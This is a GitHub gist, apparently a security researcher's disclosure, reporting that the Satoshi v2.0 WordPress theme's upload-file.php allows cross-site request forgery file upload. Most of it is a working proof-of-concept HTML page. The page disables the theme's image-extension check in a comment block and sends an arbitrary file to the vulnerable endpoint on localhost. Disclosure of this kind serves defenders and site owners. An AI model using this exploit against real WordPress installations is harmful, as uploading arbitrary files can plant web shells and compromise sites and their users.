Created
December 6, 2014 09:39
-
-
Save ethicalhack3r/f05c30ca1025525765a1 to your computer and use it in GitHub Desktop.
Satoshi v2.0 - CSRF
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Theme Name: Satoshi v2.0 | |
Theme URI: http://www.vooshthemes.com | |
Description: A Free Portfolio Theme Developed By Voosh Themes. Please look at the <a href="../wp-content/themes/satoshi/instructions/instructions.html">instructions</a> that are included with the file you downloaded <a href="../wp-content/themes/satoshi/instructions/instructions.html">(satoshi/instructions/instructions.html)</a> for details about how to configure this theme. | |
Author: Voosh Themes | |
Author URI: http://www.vooshthemes.com | |
wp-content/themes/satoshi/upload-file.php vulnerable to CSRF file upload via ajaxupload.3.5.js | |
Localhost Demo: | |
<!DOCTYPE html> | |
<html> | |
<head> | |
<meta http-equiv="content-type" content="text/html; charset=UTF-8"> | |
<title></title> | |
<script type='text/javascript' src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js"></script> | |
<script type='text/javascript' src="http://localhost/wp-content/themes/satoshi/js/ajaxupload.3.5.js"></script> | |
<script type='text/javascript'>//<![CDATA[ | |
window.onload=function(){ | |
$(function(){ | |
var btnUpload=$('#upload'); | |
var status=$('#logo-upload-status'); | |
new AjaxUpload(btnUpload, { | |
action: 'http://localhost/wp-content/themes/satoshi/upload-file.php', | |
name: 'uploadfile', | |
onSubmit: function(file, ext){ | |
/* | |
if (! (ext && /^(jpg|png|jpeg|gif)$/.test(ext))){ | |
// extension is not allowed | |
status.text('Only JPG, PNG or GIF files are allowed'); | |
return false; | |
}*/ | |
status.text('Uploading...'); | |
}, | |
onComplete: function(file, response){ | |
//On completion clear the status | |
status.text(''); | |
//Add uploaded file to list | |
if(response==="success"){ | |
$('<li></li>').appendTo('#files').html('<img src="http://localhost/wp-content/themes/satoshi/images/'+file+'" alt="" /><br />'+file).addClass('success'); | |
$('#satoshi_logo_image').val(file); | |
} else{ | |
$('<li></li>').appendTo('#files').text(file).addClass('error'); | |
} | |
} | |
}); | |
}); | |
}//]]> | |
</script> | |
</head> | |
<body> | |
<span id="logo-upload-status"></span> | |
<input class="logo-name" id="satoshi_logo_image" type="text" name="satoshi_logo_image" value=""> | |
<input type="button" class="background_pattern_button" id="upload" value="Choose Logo"> | |
</body> | |
</html> |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment